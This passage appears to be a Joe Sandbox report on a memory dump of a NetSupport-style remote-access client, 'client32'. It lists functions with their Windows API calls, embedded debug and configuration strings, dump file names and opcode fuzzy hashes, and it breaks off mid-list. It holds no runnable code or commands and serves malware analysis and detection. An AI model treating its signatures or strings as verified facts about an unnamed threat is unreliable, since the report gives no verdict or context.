                                                                                • EnterCriticalSection.KERNEL32(111EE294,1B702977,?,?,?,?,00000000,11181BDE), ref: 110535C4
                                                                                • LeaveCriticalSection.KERNEL32(111EE294,00000000,?,?,?,?,00000000,11181BDE), ref: 11053789
                                                                                  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                • std::exception::exception.LIBCMT ref: 11053635
                                                                                • __CxxThrowException@8.LIBCMT ref: 1105364A
                                                                                • GetTickCount.KERNEL32 ref: 11053660
                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 11053747
                                                                                • LeaveCriticalSection.KERNEL32(111EE294,list<T> too long,00000000,?,?,?,?,00000000,11181BDE), ref: 11053751
                                                                                  • Part of subcall function 110D0A10: _free.LIBCMT ref: 110D0A3D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$Leave$CountEnterException@8ThrowTickXinvalid_argument_free_malloc_memsetstd::_std::exception::exceptionwsprintf
                                                                                • String ID: IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$list<T> too long
                                                                                • API String ID: 2238969640-1197860701
                                                                                • Opcode ID: 56db25419c0e47adced9616d36e05b27263c0d593e28ae4636820008f3c37c9f
                                                                                • Instruction ID: 9fd56e3a4776fcf28e1c6ce8a1981ca07dec16432dee4cc0167aa7d7c32ba94c
                                                                                • Opcode Fuzzy Hash: 56db25419c0e47adced9616d36e05b27263c0d593e28ae4636820008f3c37c9f
                                                                                • Instruction Fuzzy Hash: 31517179E062659FDB45CFA4C984AADFBA4FF09348F008169E8159B344F731A904CBA5
                                                                                Function 110654E0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 80COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                • GetOEMCP.KERNEL32(View,Cachesize,00000400,00000000,776CC3F0,00000000), ref: 11065525
                                                                                  • Part of subcall function 11064880: _strtok.LIBCMT ref: 110648C0
                                                                                  • Part of subcall function 11064880: _strtok.LIBCMT ref: 110648F0
                                                                                • GetDC.USER32(00000000), ref: 11065558
                                                                                • GetDeviceCaps.GDI32(00000000,0000000E), ref: 11065563
                                                                                • GetDeviceCaps.GDI32(00000000,0000000C), ref: 1106556E
                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 110655B9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CapsDevice_strtok$Release__wcstoi64
                                                                                • String ID: 932, 949, 1361, 874, 862$Cachesize$Codepage$DBCS$View
                                                                                • API String ID: 3945178471-2526036698
                                                                                • Opcode ID: 058c2aae16d643b31adc47a1744bed462daca89727d2630be5973e582d58aa57
                                                                                • Instruction ID: 682317bc02e2a30c69588dc0a9c96f0ce4cbb9861371b6ad8b8e837dbdf19ace
                                                                                • Opcode Fuzzy Hash: 058c2aae16d643b31adc47a1744bed462daca89727d2630be5973e582d58aa57
                                                                                • Instruction Fuzzy Hash: DA21497AE002246BE3149F75CDC4BA9FB98FB08354F014565F969EB280D775A940C7D0
                                                                                Function 1101F2A0 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 70windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetMenuItemCount.USER32 ref: 1101F2B5
                                                                                • _memset.LIBCMT ref: 1101F2D8
                                                                                • GetMenuItemInfoA.USER32(?,00000000,00000001,?), ref: 1101F2F6
                                                                                • _free.LIBCMT ref: 1101F305
                                                                                  • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                  • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                • _free.LIBCMT ref: 1101F30E
                                                                                • DeleteObject.GDI32(00000000), ref: 1101F32D
                                                                                • DeleteObject.GDI32(00000000), ref: 1101F33B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: DeleteItemMenuObject_free$CountErrorFreeHeapInfoLast_memset
                                                                                • String ID: $0$UndoOwnerDraw
                                                                                • API String ID: 4094458939-790594647
                                                                                • Opcode ID: 6ed4e77d9c016c8eff6e2e5212ae31cf16a08a19f327eae3f04c88df89f206e5
                                                                                • Instruction ID: 9f4c9540ed3e85911a06978235dbefa5e19a2329fc37d196683f21109e2371eb
                                                                                • Opcode Fuzzy Hash: 6ed4e77d9c016c8eff6e2e5212ae31cf16a08a19f327eae3f04c88df89f206e5
                                                                                • Instruction Fuzzy Hash: 16119671E162299BDB04DFE49C85B9DFBECBB18318F000069E814D7244E674A5108B91
                                                                                Function 1106F400 Relevance: 16.8, APIs: 3, Strings: 8, Instructions: 297COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • wsprintfA.USER32 ref: 1106F737
                                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,?,?), ref: 1106F788
                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?), ref: 1106F7A8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterLeavewsprintf
                                                                                • String ID: %s:%d$(null)$ListenPort$NameResp from %s(%s), len=%d/%d, flags=%d, channel=%s$Port$TCPIP$UseNCS$tracerecv
                                                                                • API String ID: 3005300677-3496508882
                                                                                • Opcode ID: b470564540ec67704f5c8bb6b18a5cda2ad223c2dcf1e5bacda87c2cf28e558c
                                                                                • Instruction ID: f86a0a3523b45ae2aa4ac8696085f91b0c00e2f9513f1a57450127c273c63767
                                                                                • Opcode Fuzzy Hash: b470564540ec67704f5c8bb6b18a5cda2ad223c2dcf1e5bacda87c2cf28e558c
                                                                                • Instruction Fuzzy Hash: 17B19F79E003169FDB10CF64CC90FAAB7B9AF89708F50419DE909A7241EB75AD41CF62
                                                                                Function 11041440 Relevance: 16.0, APIs: 3, Strings: 6, Instructions: 211windowtimeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • IsWindow.USER32(00000000), ref: 1104147B
                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                • SendMessageTimeoutA.USER32(?,0000004A,00040310,?,00000002,00002710,?), ref: 11041670
                                                                                • _free.LIBCMT ref: 11041677
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: MessageSendTimeoutWindow__wcstoi64_free
                                                                                • String ID: Client$DisableJournalMenu$IsA()$Journal status( bNoMenu = %d, gpJournal = %x, %d, %d) bVistaUI %d$SendJournalStatustoSTUI(%d, %d, %d, %d)$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h
                                                                                • API String ID: 1897251511-2352888828
                                                                                • Opcode ID: fa5a56d3959a27f69506f65d8ccf5def50a2be3eef365412e5d35b6d21c3e654
                                                                                • Instruction ID: 7d7d201ace8770d3ab851aba43ef7aa7a0e05de8b0dcb1a0fb6fb2d6540d47c3
                                                                                • Opcode Fuzzy Hash: fa5a56d3959a27f69506f65d8ccf5def50a2be3eef365412e5d35b6d21c3e654
                                                                                • Instruction Fuzzy Hash: 37717DB5F0021AAFDB04DFD4CCC0AEEF7B5AF48304F244279E516A7685E631A905CBA1
                                                                                Function 11041830 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 197windowtimeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • OpenDesktopA.USER32(Default,00000000,00000000,00000041), ref: 110418C9
                                                                                • EnumDesktopWindows.USER32(00000000,Function_000416A0,?), ref: 110418E7
                                                                                • CloseDesktop.USER32(00000000), ref: 110418EE
                                                                                • _malloc.LIBCMT ref: 11041975
                                                                                • _memmove.LIBCMT ref: 11041992
                                                                                • SendMessageTimeoutA.USER32(?,0000004A,00040310,00000687,00000002,00002710,?), ref: 110419CE
                                                                                • GetLastError.KERNEL32 ref: 110419D4
                                                                                • _free.LIBCMT ref: 110419DB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Desktop$CloseEnumErrorLastMessageOpenSendTimeoutWindows_free_malloc_memmove
                                                                                • String ID: Default
                                                                                • API String ID: 3929658058-753088835
                                                                                • Opcode ID: 21436066e6ad4443d4690e0e35ce7149412e1656e3ef060addf959b48acce737
                                                                                • Instruction ID: 0a4c041bdd0654e93387037eab9a5714a5cdb1d116a6a5b81f645acbf217ae6d
                                                                                • Opcode Fuzzy Hash: 21436066e6ad4443d4690e0e35ce7149412e1656e3ef060addf959b48acce737
                                                                                • Instruction Fuzzy Hash: CD716F79E0021A9FDB04DFE4C8809EEF7B9FF48304F108169E516A7244EB74BA45CB94
                                                                                Function 11051360 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 167COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 110513F9
                                                                                • CloseHandle.KERNEL32(?,Client,UserAcknowledge,00000000,00000000), ref: 110514DB
                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseHandle__wcstoi64_memset
                                                                                • String ID: 10.21.0.0$Client$PolicyChanged, disconnect$PolicyChanged, invalid user, disconnect$PolicyChanged, userack needed, disconnect$UserAcknowledge$_profileSection
                                                                                • API String ID: 510078033-311296318
                                                                                • Opcode ID: 628bd5edbdc2b934cdea530cf6e87229bc90534bd2c32232888589127f272096
                                                                                • Instruction ID: d6821365ce57f0d8f52ec6341a9adbf8752ca4ec49bea4256a0f2cceaf2f1fbd
                                                                                • Opcode Fuzzy Hash: 628bd5edbdc2b934cdea530cf6e87229bc90534bd2c32232888589127f272096
                                                                                • Instruction Fuzzy Hash: D0513E75F4034AAFEB50CA61DC41FDAB7ACAB05708F144164FD05AB2C1EB71B604CB51
                                                                                Function 1100B870 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 149COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetOverlappedResult.KERNEL32(?,1B702737,FFFFFFFF,00000001), ref: 1100B8BC
                                                                                • GetLastError.KERNEL32 ref: 1100B8C6
                                                                                • GetTickCount.KERNEL32 ref: 1100B929
                                                                                • wsprintfA.USER32 ref: 1100B966
                                                                                • ResetEvent.KERNEL32(?), ref: 1100BA1F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountErrorEventLastOverlappedResetResultTickwsprintf
                                                                                • String ID: Audio$Hook_bits_per_sample$Hook_channels$New hooked channels,bitspersample=%d,%d (old %d,%d)
                                                                                • API String ID: 3598861413-432254317
                                                                                • Opcode ID: 4d8ccca68772371beae9765a05ae04c1519a56a32be935604de69499ee4f6c87
                                                                                • Instruction ID: 18c60078330076d4e9d4cf7e90cd241f5a56869eb84b7316cdfab9231a576d1f
                                                                                • Opcode Fuzzy Hash: 4d8ccca68772371beae9765a05ae04c1519a56a32be935604de69499ee4f6c87
                                                                                • Instruction Fuzzy Hash: 7351D1B8900A1AABE710CFA5CC84ABBF7F8EF49709F004519F56697281E7747980C7B5
                                                                                Function 11029520 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 131COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountTick
                                                                                • String ID: APMSUSPEND, suspended=%u, suspending=%u, resuming=%u$Client$DisableStandby$IgnorePowerResume$Stop resuming$_debug
                                                                                • API String ID: 536389180-1339850372
                                                                                • Opcode ID: b0d48e285380544e5a04f23f59acccb283078a85027adb73250184a2610d4c83
                                                                                • Instruction ID: 7a2480a0f38ec62df9d6165c4879ba51ca1346fdc5c877313ede350298642e4b
                                                                                • Opcode Fuzzy Hash: b0d48e285380544e5a04f23f59acccb283078a85027adb73250184a2610d4c83
                                                                                • Instruction Fuzzy Hash: 8541CD75E022359BE712CFE1D981BA9F7E4FB44348F10056AE83597284FB30E680CBA1
                                                                                Function 111076E0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 123COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                • Warning. took %d ms to get simap lock, xrefs: 1110773D
                                                                                • SetTSModeClientName(%d, %s) ret %d, xrefs: 111077FF
                                                                                • Warning. simap lock held for %d ms, xrefs: 11107825
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
